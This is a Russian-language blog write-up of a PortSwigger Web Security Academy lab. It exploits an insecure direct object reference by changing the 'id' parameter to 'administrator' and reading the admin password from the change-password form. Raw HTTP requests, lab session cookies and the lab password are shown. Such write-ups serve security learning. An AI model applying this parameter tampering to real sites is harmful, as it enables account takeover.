Kir 'cu63'

Работаю вирусным аналитиком уже 3 года. Хочу вкатиться в Баг Баунти, поэтому изучаю веб уязвимости и описываю свой путь в данном блоге. Присоединяйтеся:3

Для решения лабы нужно получить пароль администратора и удалить пользователя carlos. У нас есть креды аккаунта wiener:peter.

https://0a08009c04cf91c08113e57500d00040.web-security-academy.net/

Solution

Давайте зайдем в наш аккаунт.

IMG

Мы можем поменять пароль, давайте это сделаем. Для смены пароля отправляется следующий HTTP-запрос:

POST /my-account/change-password HTTP/2
Host: 0a08009c04cf91c08113e57500d00040.web-security-academy.net
Cookie: session=A8ftLNDC7xCMEgpUPJZiUwxuswsUz3Hr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a7200db03aa32bb8510b21b00ce0097.web-security-academy.net/my-account?id=wiener
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Origin: https://0a7200db03aa32bb8510b21b00ce0097.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=OwtMTy0ECLZB4Ye67gZQHm441sE0XH4t&password=peter

В url профиля https://0a08009c04cf91c08113e57500d00040.web-security-academy.net/my-account?id=wiener есть параметр id. Попробую подставить другой логин вместо wiener. Например, carlos.

Получилось. Значит мы можем попробовать получить доступ к другому аккаунту таким образом. Например к аккаунту администратора administator.

IMG

Теперь отправим запрос на замену пароля, чтобы увидить старый пароль от аккаута.

IMG

Из GET-запроса мы можем получит пароль администратора ow5jiz1snvfoh8w5k0wr.

POST /my-account/change-password HTTP/2
Host: 0a08009c04cf91c08113e57500d00040.web-security-academy.net
Cookie: session=pGe3qXmI9bEzCKhTqLZX6bNGv0KbdHDz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a08009c04cf91c08113e57500d00040.web-security-academy.net/my-account?id=administrator
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: https://0a08009c04cf91c08113e57500d00040.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=VXv8WXomogQouSE7PomUtxHnScwSkfgS&password=ow5jiz1snvfoh8w5k0wr

Попробуем залогиниться.

IMG

Мы получили доступ к аккаунту администратора, теперь удалим пользователя carlos для завершения лабы.

You May Also Enjoy

Exploiting blind XXE to exfiltrate data using a malicious external DTD

1 minute read

В этой лабораторной работе есть функция Check stock, которая обрабатывает XML-ввод, но не отображает результат. Чтобы решить лабораторную, необходимо получит...

Exploiting blind XXE to retrieve data via error messages

1 minute read

В этой лабораторной работе есть функция Check stock, которая обрабатывает XML-ввод, но не отображает результат. Чтобы решить лабораторную, нужно использовать...